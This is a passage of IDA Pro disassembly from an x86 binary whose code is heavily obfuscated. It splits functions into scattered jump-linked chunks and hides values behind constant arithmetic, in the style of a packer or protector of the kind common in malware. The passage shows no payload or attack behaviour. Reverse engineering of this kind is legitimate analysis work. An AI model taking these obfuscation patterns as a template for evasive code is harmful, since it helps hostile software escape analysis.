loc_44C3AB:				; CODE XREF: sub_453BA4-2F91j
		jz	loc_4466DF
		jmp	loc_456C5F
; END OF FUNCTION CHUNK	FOR sub_453BA4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45488E

loc_44C3B6:				; CODE XREF: sub_45488E:loc_451316j
		push	offset loc_457663
		jmp	loc_43B4B2
; END OF FUNCTION CHUNK	FOR sub_45488E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44C3C0:				; CODE XREF: sub_445CCD:loc_43FD9Bj
		add	eax, 96A9D703h
		add	eax, ebp
		add	eax, 0DD908341h
		push	ecx
		push	eax
		pop	ecx
		jmp	loc_44B258
; END OF FUNCTION CHUNK	FOR sub_445CCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_262. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44C3D7:				; CODE XREF: sub_43C811+13BCFj
		jmp	nullsub_167
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_44C3DC:				; CODE XREF: sub_44388C-72C8j
		xchg	ecx, [esp+4+var_4]
		call	sub_45A5F4
		push	519EC38h
		pop	edx
		sub	edx, 0F420F836h
		or	edx, 935E5BB3h
		rol	edx, 2
		jmp	loc_44C47B
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5FD

loc_44C3FE:				; CODE XREF: sub_43D5FD:loc_44A312j
		push	ecx
		mov	esp, ebp
		xchg	ecx, [esp+4+var_4]
		mov	ebp, ecx
		pop	ecx
		push	35CA16D9h
		pop	eax
		add	eax, 0E9363194h
		jmp	loc_4561AA
; END OF FUNCTION CHUNK	FOR sub_43D5FD
; ---------------------------------------------------------------------------

loc_44C418:				; CODE XREF: hvvrg7ie:0043CF7Dj
		mov	eax, [esp]
		push	edx
		push	edx
		push	offset sub_441AB2
		jmp	locret_4470F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E6A5

loc_44C427:				; CODE XREF: hvvrg7ie:00439980j
					; sub_44E6A5:loc_44237Bj
		call	sub_44D3E8

loc_44C42C:				; CODE XREF: sub_4452F2+715Cj
		jmp	loc_457258
; END OF FUNCTION CHUNK	FOR sub_44E6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C8C7

loc_44C431:				; CODE XREF: sub_44C8C7+Ej
		push	edi
		pushf
		push	0B79CA2B2h
		pop	edi
		and	edi, 0FD03A2B9h
		jmp	loc_452979
; END OF FUNCTION CHUNK	FOR sub_44C8C7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4452F2

loc_44C444:				; CODE XREF: sub_4452F2-A81Fj
		pop	esi
		add	eax, 0F83D28FDh
		rol	eax, 1Ch
		jmp	loc_44C42C
; END OF FUNCTION CHUNK	FOR sub_4452F2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_44C453:				; CODE XREF: sub_44BCAEj
		push	650E6300h
		pop	eax
		or	eax, 0C1D7EE96h
		sub	eax, 0DA5AF97Fh
		and	eax, 0EFBFE49Bh
		jmp	loc_44210F
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44C470:				; CODE XREF: sub_44D2F8-7ECj
		jz	loc_44976C
		jmp	loc_44F38B
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44388C

loc_44C47B:				; CODE XREF: sub_44388C+8B6Dj
		xor	edx, 0D6E296B9h
		test	edx, 1000000h
		jmp	loc_43D193
; END OF FUNCTION CHUNK	FOR sub_44388C
; ---------------------------------------------------------------------------
		and	ebx, edi
		jmp	loc_44A4E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DCC

loc_44C493:				; CODE XREF: sub_455DCC+Fj
		push	offset sub_4599EC
		jmp	loc_4561D3
; END OF FUNCTION CHUNK	FOR sub_455DCC
; ---------------------------------------------------------------------------

loc_44C49D:				; DATA XREF: sub_4453EC+96E9o
		xor	ecx, 85098018h
		popf
		add	eax, ecx
		pop	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-10h]

loc_44C4AD:				; CODE XREF: hvvrg7ie:loc_4597A4j
		jmp	loc_444D41
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B70B

loc_44C4B2:				; CODE XREF: sub_45B70B:loc_444D3Cj
		push	3F2C7C47h
		pop	edx
		or	edx, 0BB24E5B0h
		add	edx, 0F0364F5h
		call	sub_446A16
		push	eax
		jmp	loc_447FAB
; END OF FUNCTION CHUNK	FOR sub_45B70B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_287. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44C4D0:				; CODE XREF: sub_440643+46ABj
		mov	eax, edx
		push	edi
		push	0D8F69AA8h
		pop	edi
		or	edi, 0DDF2D637h
		sub	edi, 0A42C43DDh
		add	edi, 64D98C36h
		jmp	loc_44C140
; END OF FUNCTION CHUNK	FOR sub_440643
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_44C4F0:				; CODE XREF: sub_43B3BE+4844j
					; sub_43B3BE:loc_4479F0j ...
		jnz	loc_44FA7E
		push	0F6943D4Eh
		pop	eax
		and	eax, 0C7AEF2Bh
		test	eax, 40000000h
		jmp	loc_44E0D8
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------

loc_44C50D:				; CODE XREF: hvvrg7ie:0045A330j
		xor	edx, 4A6F2B53h

; =============== S U B	R O U T	I N E =======================================



sub_44C513	proc near		; CODE XREF: sub_44BFF5-538Dp

; FUNCTION CHUNK AT 0043B14A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D52D SIZE 0000000B BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	eax, edi
		add	al, ah
		jmp	loc_43B14A
sub_44C513	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_44C520:				; CODE XREF: sub_445CCD:loc_4426C4j
		lea	eax, [ebp-24h]
		push	eax
		push	ebx
		jmp	loc_4501B5
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------

loc_44C52A:				; CODE XREF: hvvrg7ie:00454239j
		push	7C47EF8Bh
		sbb	edx, 0B045123Dh
		jmp	sub_455DCC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_44C53A:				; CODE XREF: sub_44616F+F1B1j
		pop	eax
		rol	eax, 0Ah
		and	eax, 0FD0A7CBDh
		rol	eax, 11h
		add	eax, 2B722DFEh
		jmp	loc_445C31
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4527A1

loc_44C552:				; CODE XREF: sub_4527A1:loc_454757j
		mov	esi, edx
		adc	esi, 493DFCF7h
		xor	eax, edi
		jmp	loc_4493A5
; END OF FUNCTION CHUNK	FOR sub_4527A1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_353. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C562:				; CODE XREF: hvvrg7ie:0045057Cj
		jmp	loc_447E90
; ---------------------------------------------------------------------------

loc_44C567:				; CODE XREF: hvvrg7ie:004408DDj
		jmp	locret_45723A
; ---------------------------------------------------------------------------
		push	0DBE0174Ch
		pop	eax
		or	eax, 0C1CCF880h
		xor	eax, 4545F283h

loc_44C57E:				; CODE XREF: hvvrg7ie:loc_44D987j
		or	eax, 5B2DF2CAh
		rol	eax, 1Ch
		jmp	loc_4497C6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A839

loc_44C58C:				; CODE XREF: sub_43A839+17284j
		push	0
		push	69C85D7Fh
		pop	eax
		and	eax, 42AEA582h
		add	eax, 0C82FACAFh
		xor	eax, 99648645h
		test	eax, 100000h
		jmp	loc_44CB7A
; END OF FUNCTION CHUNK	FOR sub_43A839
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B624

loc_44C5B1:				; CODE XREF: sub_43B624:loc_44BE35j
		xchg	ecx, [esp+4+var_4]
		push	0B219D204h
		pop	esi
		and	esi, 0EF11A394h
		add	esi, 5E305004h
		push	offset loc_45A631
		jmp	nullsub_435
; END OF FUNCTION CHUNK	FOR sub_43B624

; =============== S U B	R O U T	I N E =======================================



sub_44C5D0	proc near		; CODE XREF: hvvrg7ie:004560ECj
					; hvvrg7ie:00459C2Bp

; FUNCTION CHUNK AT 00439C14 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00449D89 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		call	sub_454E54
		mov	eax, 203AE851h
		call	sub_458A13
		jmp	loc_449D89
sub_44C5D0	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_40. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E031

loc_44C5E9:				; CODE XREF: sub_44E031+3j
		jmp	sub_44612F
; END OF FUNCTION CHUNK	FOR sub_44E031
; ---------------------------------------------------------------------------

loc_44C5EE:				; DATA XREF: sub_451D60-2A7Co
		push	76ED01DAh
		pop	eax
		or	eax, 4E328249h
		rol	eax, 0Fh
		test	eax, 100h
		jmp	loc_443340
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44C608:				; CODE XREF: sub_442FD1:loc_442B21j
		jz	loc_44D774
		jmp	loc_4557AF
; END OF FUNCTION CHUNK	FOR sub_442FD1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_470. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A97

loc_44C614:				; CODE XREF: sub_457A97-16A81j
		jmp	loc_44F634
; END OF FUNCTION CHUNK	FOR sub_457A97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449CB1

loc_44C619:				; CODE XREF: sub_449CB1:loc_43C765j
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_451DD3
		jmp	loc_455B72
; END OF FUNCTION CHUNK	FOR sub_449CB1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_277. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F7FD

loc_44C629:				; CODE XREF: sub_44F7FD+18j
		jmp	nullsub_10
; END OF FUNCTION CHUNK	FOR sub_44F7FD
; ---------------------------------------------------------------------------

loc_44C62E:				; CODE XREF: hvvrg7ie:0044057Aj
		jmp	loc_441507
; ---------------------------------------------------------------------------

loc_44C633:				; CODE XREF: hvvrg7ie:0043A509j
		jmp	nullsub_20
; ---------------------------------------------------------------------------

loc_44C638:				; CODE XREF: hvvrg7ie:loc_43B5DDj
		movzx	eax, word ptr [eax]
		and	eax, 0FFFF7FFFh
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_44C640:				; CODE XREF: sub_44E3B3:loc_451889j
		add	eax, [ebp-0Ch]
		push	edx
		push	0E5C81146h
		pop	edx
		and	edx, 6521A908h
		jmp	loc_44FE3C
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_44C655:				; CODE XREF: sub_457F6F-2CCAj
		jbe	loc_443C6A

loc_44C65B:				; CODE XREF: sub_45B395:loc_4486D0j
		call	sub_43D16B
		call	sub_4483DA
; END OF FUNCTION CHUNK	FOR sub_457F6F
; START	OF FUNCTION CHUNK FOR sub_439873

loc_44C665:				; CODE XREF: sub_439873+2044Cj
		jmp	loc_43BA05
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44C66A:				; CODE XREF: sub_43E128+A4EDj
		jmp	loc_453EA5
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A3D5

loc_44C66F:				; CODE XREF: sub_43A3D5+5C11j
		jmp	sub_455075
; END OF FUNCTION CHUNK	FOR sub_43A3D5
; ---------------------------------------------------------------------------

loc_44C674:				; CODE XREF: hvvrg7ie:loc_442FFBj
		jnz	loc_4516DD
; START	OF FUNCTION CHUNK FOR sub_449C58

loc_44C67A:				; CODE XREF: sub_449C58+12j
		jmp	loc_455004
; END OF FUNCTION CHUNK	FOR sub_449C58
; ---------------------------------------------------------------------------
		shl	edi, 0Bh
		mov	edx, [edi]
		jmp	loc_4516D5
; ---------------------------------------------------------------------------

loc_44C689:				; CODE XREF: hvvrg7ie:loc_45609Ej
					; hvvrg7ie:004560C1j
		add	edx, 6E798130h
		push	offset sub_442BE9
		jmp	locret_456922
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466A4

loc_44C699:				; CODE XREF: sub_4466A4+7j
		xor	edx, 81102B08h
		or	edx, 0FA46196Ah
		sub	edx, 0E7101C8Ch
		rol	edx, 1Fh
		add	edx, 74A93AB7h
		jmp	loc_44DB28
; END OF FUNCTION CHUNK	FOR sub_4466A4
; ---------------------------------------------------------------------------

loc_44C6B9:				; CODE XREF: hvvrg7ie:004490E3j
		push	0B0EEB93Eh

; =============== S U B	R O U T	I N E =======================================



sub_44C6BE	proc near		; CODE XREF: sub_452265:loc_43D694p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043F5CC SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00444CFE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BCF5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044EB49 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044FDC3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452C1B SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00457168 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B5A5 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ecx, [esp+0]
		push	esi
		push	470905B9h
		pop	esi
		add	esi, 0E84427D4h
		jmp	loc_44BCF5
sub_44C6BE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44C6D7	proc near		; DATA XREF: sub_44412E-95D6o

; FUNCTION CHUNK AT 0043AC61 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AC6B SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00444FDA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004467F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446FA1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044AA51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454E48 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B2E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00459DE2 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00459DEF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045B2B7 SIZE 00000007 BYTES

		cmp	byte ptr [eax],	0F1h

loc_44C6DA:				; CODE XREF: hvvrg7ie:004432D3j
		jnz	loc_459DEF
		jmp	loc_4467F3
sub_44C6D7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edi, [ecx]
		jmp	sub_44C359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED23

loc_44C6EC:				; CODE XREF: sub_44ED23+B8AFj
		jz	loc_44D0E3
; END OF FUNCTION CHUNK	FOR sub_44ED23
; START	OF FUNCTION CHUNK FOR sub_4500E7

loc_44C6F2:				; CODE XREF: sub_4500E7+4j
		jmp	loc_4570A3
; END OF FUNCTION CHUNK	FOR sub_4500E7
; ---------------------------------------------------------------------------

loc_44C6F7:				; CODE XREF: hvvrg7ie:0044A49Cj
		jmp	sub_458A13
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_44C6FC:				; CODE XREF: sub_450F97-DA8Ej
		jmp	loc_44B2A9
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
		shr	ecx, 5
		xor	ebx, 0EE991B82h

loc_44C70A:				; CODE XREF: hvvrg7ie:00451540j
		shr	edx, 1Dh
		jb	loc_44D3A5
		jmp	loc_44D0E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450D8D

loc_44C718:				; CODE XREF: sub_450D8D:loc_439CA8j
		jnz	loc_446B1E
		cmp	dword ptr [ebp-10h], 0
		jnz	loc_440CF9
		mov	eax, [ebp+8]
		push	eax
		cmp	dword ptr [ebp-14h], 5
		setz	al
		call	sub_447079
		jmp	loc_453F5F
; END OF FUNCTION CHUNK	FOR sub_450D8D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_44C73D:				; CODE XREF: sub_448BC0+5D40j
		or	eax, eax
		jnz	loc_439240
		jmp	loc_44579B
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AAC8

loc_44C74A:				; CODE XREF: sub_45AAC8-1C822j
		pushf
		push	700EE933h
		pop	eax
		and	eax, 0A489D65Fh
		add	eax, 0A448BEF1h
		jmp	loc_44FEDF
; END OF FUNCTION CHUNK	FOR sub_45AAC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_44C762:				; CODE XREF: sub_44D2F8:loc_4394ECj
		xchg	ecx, [ebx]
		shr	ecx, 0Dh
		jmp	loc_4397A7
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B851

loc_44C76C:				; CODE XREF: sub_43B851+5312j
		xchg	edi, esi

loc_44C76E:				; CODE XREF: sub_43B851:loc_440B55j
		rol	eax, 0Bh
		and	eax, 24E6C9A9h
		cmp	eax, 0E02744F4h
		jmp	loc_43ECFB
; END OF FUNCTION CHUNK	FOR sub_43B851

; =============== S U B	R O U T	I N E =======================================



sub_44C782	proc near		; CODE XREF: hvvrg7ie:00439741j
					; sub_448181:loc_43D634p

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		mov	eax, [esp-4+arg_0]
		push	edx
		push	eax
		mov	eax, edi
		xchg	eax, [esp+4+var_4]
		push	offset loc_44A113
		jmp	loc_442297
sub_44C782	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_378. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C79B:				; CODE XREF: hvvrg7ie:0044A10Ej
		jmp	sub_458706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_44C7A0:				; CODE XREF: sub_43B6A5:loc_43ACBDj
		call	sub_448828

loc_44C7A5:				; CODE XREF: sub_45A91B-2305j
		jmp	nullsub_389
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447084

loc_44C7AA:				; CODE XREF: sub_447084+11j
		jmp	loc_44BE93
; END OF FUNCTION CHUNK	FOR sub_447084
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA38

loc_44C7AF:				; CODE XREF: sub_45AA38-206B3j
		jmp	nullsub_551
; END OF FUNCTION CHUNK	FOR sub_45AA38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_44C7B4:				; CODE XREF: sub_448BC0+A284j
		ror	ecx, 8
		test	eax, ebp
		jmp	loc_453E19
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CA9C

loc_44C7BE:				; CODE XREF: sub_44CA9C-B248j
		mov	[esi], eax
		pop	esi
		mov	eax, [ebp-10h]
		push	edi
		jmp	loc_45AA7C
; END OF FUNCTION CHUNK	FOR sub_44CA9C
; ---------------------------------------------------------------------------
		push	ebx
		push	1D3CEA3h
		pop	ebx
		add	ebx, 0D4E25C8Eh
		rol	ebx, 0Eh
		cmp	ebx, 669DEFB0h
		jmp	loc_450E72
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_44C7E5:				; CODE XREF: sub_44E3B3+7C22j
		cmp	edx, ebx
		jmp	loc_459A44
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------

loc_44C7EC:				; DATA XREF: sub_456FBD+2o
		add	eax, 0DFD67EAEh
		call	sub_4542E5

loc_44C7F7:				; CODE XREF: hvvrg7ie:00449D32j
		jmp	loc_45703C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44C7FC:				; CODE XREF: sub_43C811+B106j
		jmp	loc_44B6B5
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440643

loc_44C801:				; CODE XREF: sub_440643:loc_4487E1j
		pop	ecx
		add	ecx, 0BD734ACh
		and	ecx, 42AB0A1Eh
		jns	loc_44CBC3
		test	ebx, 5BA84608h
		jmp	loc_43BE30
; END OF FUNCTION CHUNK	FOR sub_440643

; =============== S U B	R O U T	I N E =======================================



sub_44C81F	proc near		; DATA XREF: sub_44955C-9C13o
		push	edx
		push	ebx
		push	0C49CF981h
sub_44C81F	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_45A234

loc_44C826:				; CODE XREF: sub_45A234:loc_43A693j
		pop	ebx
		sub	ebx, 0A66AF70Eh
		jmp	loc_43B4C6
; END OF FUNCTION CHUNK	FOR sub_45A234
; ---------------------------------------------------------------------------

loc_44C832:				; CODE XREF: hvvrg7ie:0043E1E9j
		jz	loc_45850E
		jnp	loc_44FFEB

loc_44C83E:				; CODE XREF: hvvrg7ie:loc_43E5F6j
		add	ecx, 2B65350Ch
		mov	[ecx], eax
		push	offset loc_44776E
		jmp	loc_452228
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458F33

loc_44C850:				; CODE XREF: sub_458F33-17B1Aj
		jnz	loc_457F1F
		jmp	loc_448EAE
; END OF FUNCTION CHUNK	FOR sub_458F33
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_457. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_44C85C:				; CODE XREF: sub_442FD1+B35Aj
		jmp	loc_441F19
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455B9C

loc_44C861:				; CODE XREF: sub_455B9C-C34Cj
		jmp	loc_44E26C
; END OF FUNCTION CHUNK	FOR sub_455B9C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_44C866:				; CODE XREF: sub_43C811-2480j
		jnz	loc_443266
		jmp	loc_446A60
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------

locret_44C871:				; CODE XREF: hvvrg7ie:0044BA9Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_44C872:				; CODE XREF: sub_43D285+1E2DDj
		jmp	nullsub_464
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_44C877:				; CODE XREF: hvvrg7ie:004456FEj
		jmp	loc_44DCEB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4484B9

loc_44C87C:				; CODE XREF: sub_4484B9+10j
		push	95E05967h
		pop	edi
		sub	edi, ds:4000F7h
		add	edi, 46A34E8Bh
		xchg	edi, [esp+4+var_4]
		mov	eax, [ebp-8]
		jmp	loc_44932A
; END OF FUNCTION CHUNK	FOR sub_4484B9
; ---------------------------------------------------------------------------
		mov	eax, 0D6CB94Ch
		push	eax
		push	92D360EBh
		pop	eax
		jmp	loc_450107

; =============== S U B	R O U T	I N E =======================================



sub_44C8AA	proc near		; CODE XREF: sub_43F6DB+BF3Ap
					; hvvrg7ie:0044E099j

; FUNCTION CHUNK AT 0043CDB0 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		and	al, 7
		mov	[ebp-0Bh], al

loc_44C8B3:				; CODE XREF: sub_445CCD:loc_44F297j
		xor	eax, eax
		mov	al, [ebp-0Bh]
		mov	ecx, 8
		push	offset loc_44E825
		jmp	loc_43CDB0
sub_44C8AA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44C8C7	proc near		; CODE XREF: hvvrg7ie:0043948Ep
					; hvvrg7ie:0045AE77j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004393B2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004434B5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00449F8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C431 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E98C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452979 SIZE 00000010 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edx, [esp-4+arg_0]
		push	eax
		mov	eax, ebx
		xchg	eax, [esp+0]
		push	ecx
		jmp	loc_44C431
sub_44C8C7	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44C8DA:				; CODE XREF: hvvrg7ie:0044DA15j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_29
; ---------------------------------------------------------------------------
		xchg	esi, [esp]
		mov	edx, esi
		pop	esi
		mov	eax, [esp]
		push	offset loc_4495ED
		jmp	locret_45033A
; ---------------------------------------------------------------------------

loc_44C8F5:				; CODE XREF: hvvrg7ie:00459473j
		jnp	loc_4398BB

; =============== S U B	R O U T	I N E =======================================



sub_44C8FB	proc near		; CODE XREF: hvvrg7ie:0045AFE3p

; FUNCTION CHUNK AT 004390E6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DE8C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F657 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BB12 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044D491 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044EDE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456B11 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00457FAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B6B2 SIZE 0000000F BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	edx, 1D0DFB51h
		mov	edx, [edx]
		jmp	loc_45B6B2
sub_44C8FB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45423F

loc_44C90C:				; CODE XREF: sub_45423F:loc_439AD4j
		push	3E1E4E2Fh
		xchg	eax, [esp+4+var_4]
		mov	edx, eax
		pop	eax
		jmp	loc_459C30
; END OF FUNCTION CHUNK	FOR sub_45423F

; =============== S U B	R O U T	I N E =======================================



sub_44C91C	proc near		; CODE XREF: sub_43F98C+516Ap
					; hvvrg7ie:00445FABj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00457CB3 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	eax, [esp-4+arg_0]
		jmp	loc_457CB3
sub_44C91C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44C928:				; CODE XREF: hvvrg7ie:loc_43ED27j
		and	eax, 0AAF3E746h
		or	eax, 6F1415DFh
		add	eax, 0B2FF9EA3h
		call	sub_450C5A
		mov	ds:dword_41D168, eax
		lea	eax, nullsub_17
		jmp	loc_451950
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D30A

loc_44C950:				; CODE XREF: sub_43D30A+1384Aj
		mov	[esi], edi
		jmp	loc_443D7D
; END OF FUNCTION CHUNK	FOR sub_43D30A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4422A8

loc_44C957:				; CODE XREF: sub_4422A8+8j
		sub	al, 99h
		call	sub_44736C

loc_44C95E:				; CODE XREF: sub_454A8B+3j
		jmp	loc_440EB3
; END OF FUNCTION CHUNK	FOR sub_4422A8
; ---------------------------------------------------------------------------

loc_44C963:				; CODE XREF: hvvrg7ie:004591B8j
		ja	loc_45A631
		jge	loc_43F7DB
		jmp	loc_4530AB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E128

loc_44C974:				; CODE XREF: sub_43E128:loc_449FB9j
		jz	loc_45A499

loc_44C97A:				; CODE XREF: hvvrg7ie:0044D5FBj
		jmp	loc_452D83
; END OF FUNCTION CHUNK	FOR sub_43E128
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B36F

loc_44C97F:				; CODE XREF: sub_43B36F+608Bj
		jmp	loc_43A17A
; END OF FUNCTION CHUNK	FOR sub_43B36F
; ---------------------------------------------------------------------------
		xchg	edx, ebx
		jmp	loc_45A48B
; ---------------------------------------------------------------------------
